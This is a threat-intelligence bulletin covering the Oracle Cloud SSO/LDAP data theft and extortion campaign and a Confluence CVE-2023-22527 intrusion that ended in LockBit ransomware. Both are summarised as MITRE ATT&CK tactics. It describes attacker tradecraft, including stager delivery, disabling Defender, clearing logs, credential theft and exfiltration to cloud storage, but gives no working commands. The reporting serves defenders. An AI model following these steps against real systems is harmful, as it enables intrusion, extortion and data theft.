Security Bulletin: March 2025
šŸ”

Security Bulletin: March 2025

Ā 

Oracle Cloud breached, with 6 million records exfiltrated

Ā 
On 21 March 2025, CloudSEKā€™s XVigil discovered a threat actor, "rose87168," selling 6M records exfiltrated from SSO and LDAP of Oracle Cloud. The data includes JKS files, encrypted SSO passwords, key files, and enterprise manager JPS keys.
The attacker, active since January 2025, is incentivizing decryption assistance and demanding payment for data removal from over 140K affected tenants.
What do we know so far?

Threat Actor

rose87168 with No known prior history.

Tactics, Techniques, and Procedures (TTPs):

Initial Access:

  • Suspected use of an undisclosed (zero-day) vulnerability.
  • Vulnerability likely present in Oracle WebLogic servers used for hosting the login pages for oraclecloud.com.
  • Targeted the login endpoint: login.(region-name).oraclecloud.com.

Data Exfiltration:

  • Dumped approximately 6 million records from Oracle Cloudā€™s SSO and LDAP.
  • Data includes JKS files, encrypted SSO passwords, key files, and enterprise manager JPS keys.

Post-Compromise Activity:

  • Extortion: Demanding payment from affected tenants (over 140,000) for data removal.
  • Incentivizing decryption: Offering incentives for help decrypting SSO and LDAP passwords.
  • Social Media: Created an X (formerly Twitter) page and followed Oracle-related accounts.

Modus Operandi (MO):

  • Vulnerability Exploitation: Identify and exploit a vulnerability in Oracle WebLogic servers used for Oracle Cloud login pages.
  • Data Extraction: Gain unauthorized access to SSO and LDAP data, extracting sensitive information like passwords, keys, and JKS files.
  • Data Storage and Leverage: Store the exfiltrated data and use it for extortion.
  • Extortion and Demands: Contact affected organizations, demanding payment for the removal of their data from the compromised set.
  • Incentivize Further Compromise: Offer rewards for assistance in cracking encrypted passwords, potentially increasing the impact of the breach.
Ā 

Report Credit:

Ā 

Ā 

Confluence Exploit Leads to LockBit Ransomware

Threat Actor:

LockBit ransomware group/affiliate or ShadowSyndicate ransomware group (based on IP address associations with AnyDesk C2 server)

Tactics, Techniques, and Procedures (TTPs):

Initial Access:

  • T1190 Exploit Public-Facing Application: Exploitation of CVE-2023-22527 (Confluence RCE vulnerability) on an exposed Windows Confluence server.

Execution:

  • T1218.005 Signed Binary Proxy Execution: Mshta: Used mshta.exe to download and execute a Metasploit stager.
  • T1059.001 Command and Scripting Interpreter: PowerShell: Used PowerShell for various tasks, including downloading AnyDesk, deobfuscating and executing shellcode, clearing event logs and disabling Windows Defender.

Persistence:

  • T1543.003 Create or Modify System Process: Windows Service: Installed AnyDesk as a service for persistent remote access.
  • T1136.001 Create Account: Local Account: Created a new local account (ā€œbackupā€) and added it to the Administrators group.

Privilege Escalation:

  • Confluence RCE provided SYSTEM access.
  • Exploited the initial access to create a local administrator account.
  • T1068 Exploitation for Privilege Escalation: Used the Confluence RCE vulnerability to gain SYSTEM privileges initially.

Defense Evasion

  • T1562.001 Impair Defenses: Disable or Modify Tools: Turned off Windows Defender via the GUI.
  • T1070.001 Indicator Removal on Host: Clear Windows Event Logs: Cleared Windows event logs on the file server.
  • Deleted files they brought into the environment.

Command And Control

  • T1573.001 Encrypted Channel: Symmetric Cryptography: Metasploit communication was likely encrypted.
  • T1071.001 Application Layer Protocol: Web Protocols: Used HTTP for downloading the Metasploit stager.
  • T1219 Remote Access Software: Used AnyDesk for remote access and control.

Exfiltration

  • T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage: Used Rclone to exfiltrate data to MEGA.io cloud storage.

Modus Operandi (MO)

  • Exploit Confluence vulnerability (CVE-2023-22527).
  • Deploy Metasploit stager and AnyDesk for persistent access.
  • Use Mimikatz and other tools to steal credentials.
  • Deploy LockBit ransomware using PDQ Deploy for automated distribution, and manual execution on critical servers.

Report Credit

Ā